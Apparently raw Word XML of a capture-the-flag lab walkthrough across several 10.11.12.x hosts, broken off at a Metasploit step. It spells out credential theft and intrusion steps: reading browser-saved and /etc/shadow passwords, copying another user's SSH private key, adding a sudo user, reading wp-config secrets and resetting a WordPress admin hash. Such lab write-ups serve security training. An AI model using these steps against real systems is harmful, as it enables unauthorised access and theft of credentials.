          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59BD8F4C" wp14:editId="390F90BF">
            <wp:extent cx="5940425" cy="4518025"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1952046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696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37EF" w14:textId="19CC60AC" w:rsidR="005B7CB7" w:rsidRDefault="005B7CB7" w:rsidP="00163C4C">
      <w:r>
        <w:t>Note that it has some RDP information related, hence you need a user to try and connect to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B3C05" w14:textId="530E4551" w:rsidR="005B7CB7" w:rsidRDefault="001611F7" w:rsidP="00163C4C">
      <w:r>
        <w:t>But we already have a user, so use it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654382AA" w14:textId="447162DA" w:rsidR="00046399" w:rsidRDefault="00046399" w:rsidP="00163C4C">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00046399">
        <w:t xml:space="preserve"> xfreerdp /u:ed /p:FLAG-6986 /v:10.11.12.28</w:t>
      </w:r>
      <w:r>
        <w:t>`, and then you get the RDP. From there, navigate in file explorer to C:\, and find FLAG.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255C34AB" w14:textId="39F5A7A9" w:rsidR="000E4D23" w:rsidRDefault="000E4D23" w:rsidP="00163C4C">
      <w:r w:rsidRPr="000E4D23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202DD6BD" wp14:editId="55BB5A2B">
            <wp:extent cx="4410691" cy="2619741"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="323921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212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84E" w14:textId="7B90EB78" w:rsidR="000E4D23" w:rsidRDefault="000E4D23" w:rsidP="000E4D23">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>QUESTION 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF6DE9" w14:textId="769FE400" w:rsidR="000E4D23" w:rsidRDefault="001C0EC2" w:rsidP="000E4D23">
      <w:r>
        <w:t>Then, out of the blue, you need to Open EDGE, and then inside there go to “</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0EC2">
        <w:t>edge://wallet/passwords/details/vinyl.vault</w:t>
      </w:r>
      <w:r>
        <w:t>”, then provide the password, and go to saved websites/passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249AE405" w14:textId="3627241C" w:rsidR="001C0EC2" w:rsidRDefault="001C0EC2" w:rsidP="000E4D23">
      <w:r w:rsidRPr="001C0EC2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16A10BA2" wp14:editId="37B9454D">
            <wp:extent cx="5940425" cy="5949950"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="207903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3731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895B" w14:textId="0F9395E4" w:rsidR="00A31655" w:rsidRDefault="00A31655" w:rsidP="00A31655">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10.11.12.38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB490D5" w14:textId="4CADAAED" w:rsidR="00A31655" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 1</w:t>
      </w:r>
      <w:r w:rsidR="009868BE">
        <w:t xml:space="preserve"> + 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB9092" w14:textId="7F75C1B4" w:rsidR="009868BE" w:rsidRDefault="009868BE" w:rsidP="009868BE">
      <w:r w:rsidRPr="009868BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="639500AD" wp14:editId="6B89D501">
            <wp:extent cx="5182323" cy="2095792"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1456475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7551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4DBC" w14:textId="79955626" w:rsidR="009868BE" w:rsidRDefault="009868BE" w:rsidP="009868BE">
      <w:r>
        <w:t xml:space="preserve">Runs postgres, ssh, and some weirdo. Try to navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00E17CFB" w:rsidRPr="00BB1053">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.11.12.38:3826</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E17CFB">
        <w:t>, and you get a website with a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6529D" w14:textId="76ECAA21" w:rsidR="00E17CFB" w:rsidRDefault="00E17CFB" w:rsidP="009868BE">
      <w:r>
        <w:t>First of all, run `sudo -l` to know what kind of stuff you can run without any root password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFDC4B9" w14:textId="7612761D" w:rsidR="00753F56" w:rsidRPr="009868BE" w:rsidRDefault="00F756AA" w:rsidP="009868BE">
      <w:r w:rsidRPr="00F756AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D4A21C2" wp14:editId="2381178C">
            <wp:extent cx="5940425" cy="2591435"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="774976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7660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BDA3" w14:textId="4F5EBE3C" w:rsidR="00CE6146" w:rsidRDefault="00F756AA" w:rsidP="00CE6146">
      <w:r>
        <w:t>You can do cat without sudo. So try around and see files with ls.</w:t>
      </w:r>
      <w:r w:rsidR="00774868">
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r w:rsidR="00774868" w:rsidRPr="00774868">
        <w:t xml:space="preserve"> ls -la ../../var/lib/postgresql/</w:t>
      </w:r>
      <w:r w:rsidR="00774868">
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D486947" w14:textId="55A4C72F" w:rsidR="00D83421" w:rsidRDefault="00D83421" w:rsidP="00CE6146">
      <w:r w:rsidRPr="00D83421">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7A29C5" wp14:editId="7CF4BA4E">
            <wp:extent cx="5940425" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525"/>
            <wp:docPr id="175452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622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F8D6" w14:textId="614BC407" w:rsidR="00A62D05" w:rsidRDefault="00A62D05" w:rsidP="00CE6146">
      <w:r>
        <w:t>Run cat /var/lib/postgresql/.psql_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8381C" w14:textId="69EA7C2E" w:rsidR="00C42E4D" w:rsidRDefault="00C42E4D" w:rsidP="00CE6146">
      <w:r w:rsidRPr="00C42E4D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63AAD6D6" wp14:editId="33C684A7">
            <wp:extent cx="5877745" cy="3057952"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="266797879" name="Picture 1" descr="A computer screen shot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97879" name="Picture 1" descr="A computer screen shot of a fla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F17E" w14:textId="3ABE87B2" w:rsidR="009F2CFE" w:rsidRDefault="009F2CFE" w:rsidP="00CE6146">
      <w:r>
        <w:t>Now you see both flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78527438" w14:textId="2F739020" w:rsidR="00A369FB" w:rsidRDefault="00A369FB" w:rsidP="00CE6146">
      <w:r w:rsidRPr="00A369FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F6CE474" wp14:editId="1F1306FC">
            <wp:extent cx="5753903" cy="3781953"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1206356851" name="Picture 1" descr="A screenshot of a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56851" name="Picture 1" descr="A screenshot of a rec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C0C4" w14:textId="21271DA0" w:rsidR="00A369FB" w:rsidRDefault="00A369FB" w:rsidP="00CE6146">
      <w:r>
        <w:t>Then you can read the files of other users. In this case – taylor.</w:t>
      </w:r>
      <w:r w:rsidR="007E1307">
        <w:t xml:space="preserve"> You can read .bash_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB5EAE2" w14:textId="1BAE92F5" w:rsidR="00AF0CAA" w:rsidRDefault="00AF0CAA" w:rsidP="00CE6146">
      <w:r>
        <w:t>Then you can read and copy the files via `cat /home/taylor/.ssh/id_rsa` and the `id_rsa.pub`.</w:t>
      </w:r>
      <w:r w:rsidR="002C659E">
        <w:t xml:space="preserve"> Copy them to your machine.</w:t>
      </w:r>
      <w:r w:rsidR="00A01325">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E826A97" w14:textId="5E258355" w:rsidR="00A01325" w:rsidRDefault="00A01325" w:rsidP="00CE6146">
      <w:r>
        <w:t>Then add it to ssh-agent `eval $(ssh-agent)`, `ssh-add id_rsa</w:t>
      </w:r>
      <w:r w:rsidR="00150841">
        <w:t>`. On .pub make sure to have rw r r, on the simple one have rw only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208779BE" w14:textId="1AB8C130" w:rsidR="00321097" w:rsidRDefault="00321097" w:rsidP="00CE6146">
      <w:r w:rsidRPr="00321097">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD81B9D" wp14:editId="0ACD378D">
            <wp:extent cx="5038725" cy="3952875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="168560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030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0ADF" w14:textId="465069E0" w:rsidR="00D70140" w:rsidRDefault="00D70140" w:rsidP="00CE6146">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now you will have access to another server via ssh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF83E2" w14:textId="3AF270E0" w:rsidR="00490AB5" w:rsidRDefault="00490AB5" w:rsidP="00490AB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10.11.12.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF74E6" w14:textId="328AD07D" w:rsidR="00490AB5" w:rsidRDefault="00DB7B10" w:rsidP="00DB7B10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE88062" w14:textId="48F9EF93" w:rsidR="00521A62" w:rsidRDefault="00521A62" w:rsidP="00521A62">
      <w:r>
        <w:t xml:space="preserve">Once you have captured the ssh stuff, you can then go into the system. </w:t>
      </w:r>
      <w:r w:rsidR="001E167A">
        <w:t xml:space="preserve">Make sure to </w:t>
      </w:r>
      <w:r w:rsidR="00AD51C7">
        <w:t>check the `sudo -l` to know what you can do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE0E30" w14:textId="3875D2FD" w:rsidR="00CA6BD3" w:rsidRDefault="00CA6BD3" w:rsidP="00521A62">
      <w:r w:rsidRPr="00CA6BD3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2BF9F8" wp14:editId="7B34E57C">
            <wp:extent cx="4182059" cy="933580"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="20090796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79684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BA92" w14:textId="5ACBC9ED" w:rsidR="00CA6BD3" w:rsidRPr="00521A62" w:rsidRDefault="00CA6BD3" w:rsidP="00521A62">
      <w:r>
        <w:t>You can add users, so add one with sudo privilege.</w:t>
      </w:r>
      <w:r w:rsidR="00980276">
        <w:t xml:space="preserve"> `sudo adduser serj --ingroup sudo`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A36E03" w14:textId="0E2434AE" w:rsidR="00B97BC4" w:rsidRDefault="000F141E" w:rsidP="00B97BC4">
      <w:r w:rsidRPr="000F141E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E05B0E8" wp14:editId="216FD5FD">
            <wp:extent cx="4248743" cy="981212"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14045361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6158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C03" w14:textId="1ED48069" w:rsidR="000F141E" w:rsidRDefault="000F141E" w:rsidP="00B97BC4">
      <w:r>
        <w:t>Now you can do stuff with sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082DCB67" w14:textId="6C2749FF" w:rsidR="00B41784" w:rsidRDefault="00B41784" w:rsidP="00B97BC4">
      <w:r>
        <w:t>First thing you can do, is go to `cd /var/www/html/wordpress` and do `cat wp-config.php` to read the configuration file, and find a flag, and also db password, user, and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CEC7B1" w14:textId="75DACF95" w:rsidR="00481F72" w:rsidRDefault="00481F72" w:rsidP="00B97BC4">
      <w:r w:rsidRPr="00481F72">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665A6C6E" wp14:editId="5C705776">
            <wp:extent cx="5940425" cy="3547745"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="148826134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61345" name="Picture 1" descr="A computer screen shot of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52E4" w14:textId="509CE820" w:rsidR="00D76AAF" w:rsidRDefault="00E45BBC" w:rsidP="00E45BBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A62D5AF" w14:textId="6B058F8E" w:rsidR="00E45BBC" w:rsidRDefault="00E45BBC" w:rsidP="00E45BBC">
      <w:r>
        <w:t>Go to a previous directory, `cd /var/www/html/flag`and `cat index.html` to get a flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DAF0DE" w14:textId="2F5B579E" w:rsidR="000D79FA" w:rsidRDefault="000D79FA" w:rsidP="00E45BBC">
      <w:r w:rsidRPr="000D79FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E3D2109" wp14:editId="0BC76807">
            <wp:extent cx="5940425" cy="2491105"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="564056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56500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FD5C" w14:textId="29727484" w:rsidR="00ED0738" w:rsidRDefault="00ED0738" w:rsidP="00ED0738">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ACB99C" w14:textId="63B7031A" w:rsidR="00ED0738" w:rsidRDefault="00ED0738" w:rsidP="00ED0738">
      <w:r>
        <w:t>In the directory from 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED0738">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> question you can find the robots.txt and inside of it you can find a flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD5BAD3" w14:textId="256EA876" w:rsidR="00B823DE" w:rsidRDefault="00B823DE" w:rsidP="00ED0738">
      <w:r w:rsidRPr="00B823DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="214176EF" wp14:editId="677C6DE9">
            <wp:extent cx="5077534" cy="562053"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="170448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862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B3CE" w14:textId="6F192901" w:rsidR="00EF36F3" w:rsidRDefault="00EF36F3" w:rsidP="00ED0738">
      <w:r>
        <w:t xml:space="preserve">You could also just </w:t>
      </w:r>
      <w:r w:rsidR="00B50A1E">
        <w:t>navigate to the website and check it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFB684" w14:textId="0CA842DC" w:rsidR="000F6D07" w:rsidRDefault="000F6D07" w:rsidP="000F6D07">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB246E6" w14:textId="3143CD3C" w:rsidR="00C86180" w:rsidRDefault="00C86180" w:rsidP="00C86180">
      <w:r>
        <w:t>One of the open ports is 2121 and has ftp on it. You can connect to it and try anonymous user and no password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB6106" w14:textId="64322C02" w:rsidR="00D312D0" w:rsidRDefault="00D312D0" w:rsidP="00C86180">
      <w:r>
        <w:t>`ftp 10.11.12.53 2121` and then use anonymous, and no password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0BD7B" w14:textId="3A38BC51" w:rsidR="00AF1641" w:rsidRDefault="00AF1641" w:rsidP="00C86180">
      <w:r w:rsidRPr="00AF1641">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9D3E2D" wp14:editId="4EE021CF">
            <wp:extent cx="5106113" cy="2505425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12125724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2469" name="Picture 1" descr="A computer screen shot of a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DB01" w14:textId="11B43641" w:rsidR="007D00D7" w:rsidRDefault="007D00D7" w:rsidP="00C86180">
      <w:r>
        <w:t>Then go ahead and get the flag.txt (and the other one</w:t>
      </w:r>
      <w:r w:rsidR="00D4661D">
        <w:t xml:space="preserve"> for later</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A782999" w14:textId="6FB44EA6" w:rsidR="006D516C" w:rsidRDefault="00134CE4" w:rsidP="00C86180">
      <w:r>
        <w:t>`cat flag.txt`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C7CCF" w14:textId="5D4DFADC" w:rsidR="00164A04" w:rsidRDefault="00164A04" w:rsidP="00C86180">
      <w:r w:rsidRPr="00164A04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="139DA3D7" wp14:editId="0A4481E0">
            <wp:extent cx="3658111" cy="590632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="187283549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35496" name="Picture 1" descr="A computer screen with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41E9" w14:textId="295DADE1" w:rsidR="00164A04" w:rsidRDefault="00164A04" w:rsidP="00164A04">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>QUESTION 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B4D44" w14:textId="51781AEF" w:rsidR="00164A04" w:rsidRDefault="00920D45" w:rsidP="00C86180">
      <w:r>
        <w:t>You have other home directories, so you can list the contents and read the interesting files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A3D61" w14:textId="4FBB9E75" w:rsidR="00920D45" w:rsidRDefault="002A0A8C" w:rsidP="00C86180">
      <w:r w:rsidRPr="002A0A8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBACCD6" wp14:editId="5B8DA38E">
            <wp:extent cx="5468113" cy="714475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="25232903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29031" name="Picture 1" descr="A close up of a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06AF" w14:textId="3F5B1AC4" w:rsidR="00BC3C7A" w:rsidRDefault="00BC3C7A" w:rsidP="00C86180">
      <w:r>
        <w:t>(but this is miscellaneous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC66E2C" w14:textId="5EB36CDF" w:rsidR="00FA472F" w:rsidRPr="00C86180" w:rsidRDefault="00FA472F" w:rsidP="00FA472F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186971A9" w14:textId="458C774D" w:rsidR="000D79FA" w:rsidRDefault="00BB60D1" w:rsidP="00E45BBC">
      <w:r>
        <w:t>You have a database running for WordPress website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2A8FC5" w14:textId="4611BFD9" w:rsidR="00BB60D1" w:rsidRDefault="00BB60D1" w:rsidP="00E45BBC">
      <w:r>
        <w:t>Use the data we found about it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8A9F6" w14:textId="20A3A2EC" w:rsidR="00BB60D1" w:rsidRDefault="00BB60D1" w:rsidP="00E45BBC">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB60D1">
        <w:t xml:space="preserve"> mysql </w:t>
      </w:r>
      <w:r w:rsidR="00CE16E8">
        <w:t>-h localhost -u wpuser -p wordpress_db</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="004B61E1">
        <w:t xml:space="preserve"> + password </w:t>
      </w:r>
      <w:r w:rsidR="004B61E1" w:rsidRPr="00BB60D1">
        <w:t>Cdxv2a3gUkqf7G4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769F37A4" w14:textId="60E4291C" w:rsidR="00602047" w:rsidRDefault="00602047" w:rsidP="00E45BBC">
      <w:r>
        <w:t>USE wordpress_db; (for any circumstances)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBC381B" w14:textId="0DFCD21E" w:rsidR="00B52357" w:rsidRDefault="00B52357" w:rsidP="00E45BBC">
      <w:r>
        <w:t>SHOW TABLES;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C3319" w14:textId="1647B786" w:rsidR="00B52357" w:rsidRDefault="008E2EBF" w:rsidP="00E45BBC">
      <w:r>
        <w:t>SELECT * FROM wp_users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D124755" w14:textId="7D0B248A" w:rsidR="008E2EBF" w:rsidRDefault="002C4BB4" w:rsidP="00E45BBC">
      <w:r w:rsidRPr="002C4BB4">
        <w:t>UPDATE wp_users SET user_pass=MD5('hola') WHERE user_login='real_admin';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14363B2D" w14:textId="610BAA22" w:rsidR="008166B9" w:rsidRDefault="008166B9" w:rsidP="00E45BBC">
      <w:r>
        <w:t xml:space="preserve">Then go to the browser, navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="00BB1053">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.11.12.53/wp-admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. Use the password that you set and the username “real_admin”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427DB9EF" w14:textId="238442F8" w:rsidR="00BF163E" w:rsidRDefault="00BF163E" w:rsidP="00E45BBC">
      <w:r>
        <w:t>On the left find Posts &gt; All posts &gt; First post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2940C678" w14:textId="459D1050" w:rsidR="00BF163E" w:rsidRDefault="00BF163E" w:rsidP="00E45BBC">
      <w:r>
        <w:t>There you find your flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54569178" w14:textId="176A80E8" w:rsidR="000E001F" w:rsidRDefault="000E001F" w:rsidP="00E45BBC">
      <w:r w:rsidRPr="000E001F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE0083D" wp14:editId="4AD94E4A">
            <wp:extent cx="2410161" cy="1428949"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="94644949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49494" name="Picture 1" descr="A close-up of a white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90D6" w14:textId="64D20493" w:rsidR="00E05608" w:rsidRDefault="00E05608" w:rsidP="00E05608">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26043A78" w14:textId="43D4ACF0" w:rsidR="00FE659D" w:rsidRDefault="00FE659D" w:rsidP="00FE659D">
      <w:r>
        <w:t>For this you would have to crack the hashes from the wp_users to get a flag, with john.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF1567" w14:textId="05924317" w:rsidR="00A94E92" w:rsidRDefault="00A94E92" w:rsidP="00A94E92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1515D" w14:textId="561E3881" w:rsidR="00A94E92" w:rsidRDefault="00A94E92" w:rsidP="00A94E92">
      <w:r>
        <w:t xml:space="preserve">In the same analysis we did with Ettercap, we managed to see the information regarding the </w:t>
      </w:r>
      <w:r w:rsidR="0086075A">
        <w:t>another last flag which is the password for “ftpuser”. Knowing it’s a flag, you can capture it from the /etc/shadow (the password hash), and try to crack it with john the ripper knowing that the value is “FLAG-%%%%%%”</w:t>
      </w:r>
      <w:r w:rsidR="003278E3">
        <w:t xml:space="preserve"> and etc.</w:t>
      </w:r>
      <w:r w:rsidR="0086075A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F207A69" w14:textId="638BB2F5" w:rsidR="00880D7F" w:rsidRDefault="00880D7F" w:rsidP="00880D7F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10.11.12.75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727EACEE" w14:textId="15481744" w:rsidR="00880D7F" w:rsidRPr="00880D7F" w:rsidRDefault="00622293" w:rsidP="00622293">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69B480" w14:textId="1E5907C4" w:rsidR="00E24279" w:rsidRDefault="00E40A83" w:rsidP="00FE659D">
      <w:r>
        <w:t xml:space="preserve">This you can again get from the analysis with Ettercap, or by doing various lookup on </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidRPr="00BB1053">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.11.12.75:9200/catalog/_search</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> | grep FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E31CCCE" w14:textId="126CC100" w:rsidR="003111D7" w:rsidRDefault="003111D7" w:rsidP="00FE659D">
      <w:r w:rsidRPr="003111D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7134E095" wp14:editId="72750F09">
            <wp:extent cx="5940425" cy="4996815"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="30086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6092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F29C" w14:textId="4D2A05AF" w:rsidR="005D7368" w:rsidRDefault="005D7368" w:rsidP="00FE659D">
      <w:r w:rsidRPr="005D7368">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6028E071" wp14:editId="1C1A47E2">
            <wp:extent cx="5940425" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525"/>
            <wp:docPr id="4292084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8486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B9D7" w14:textId="65736065" w:rsidR="004353CD" w:rsidRDefault="004353CD" w:rsidP="004353CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC95DF7" w14:textId="091669AC" w:rsidR="00526530" w:rsidRDefault="00526530" w:rsidP="00526530">
      <w:r>
        <w:t>Start the Metasploit Framework (sudo mfsdb init &amp;&amp; msfconsole)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF43E0" w14:textId="7FFF0583" w:rsidR="00DE2038" w:rsidRDefault="00DE2038" w:rsidP="00526530">
      <w:r>
        <w:t>We know that the service runs Elasticsearch 1.1.1 so we can look up exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535B4E3" w14:textId="14B75D28" w:rsidR="0077691C" w:rsidRDefault="0077691C" w:rsidP="00526530">
      <w:r>
        <w:t>search elastic search 1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F96D9DF" w14:textId="09766F2D" w:rsidR="0077691C" w:rsidRDefault="007524FF" w:rsidP="00526530">
